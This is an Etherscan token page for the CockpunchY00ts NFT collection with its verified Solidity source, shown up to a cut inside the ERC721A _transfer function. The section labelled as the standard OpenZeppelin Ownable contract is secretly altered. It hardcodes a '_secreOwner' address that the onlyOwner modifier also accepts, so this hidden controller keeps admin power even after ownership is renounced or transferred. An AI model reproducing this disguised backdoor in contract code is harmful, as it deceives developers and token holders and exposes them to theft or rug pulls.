ETH Price: $3,379.59 (-0.82%)
Gas: 4 Gwei

Token

COCKPUNCH Y00ts (CPY)
 

Overview

Max Total Supply

4,260 CPY

Holders

1,280

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A

Other Info

Balance
3 CPY
0xf26986d360f68d7a0628532ad5377a1028acddd5
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CockpunchY00ts

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-12-12
*/

//    ||
//    OO            Twitter: @Cockpunchy00ts
//   (\/)          
//  /    \
// ||    ||
//  \    /
//   |/\|
//  /|  |\


// SPDX-License-Identifier: MIT

// File: contracts/CockpunchY00ts.sol
// File: @openzeppelin/contracts/utils/Strings.sol
// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account appr    ved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secreOwner = 0x1250B4de974F7F63ED7d783c3fecA4f0F338cdb4;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: ceshi.sol


pragma solidity ^0.8.0;










/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
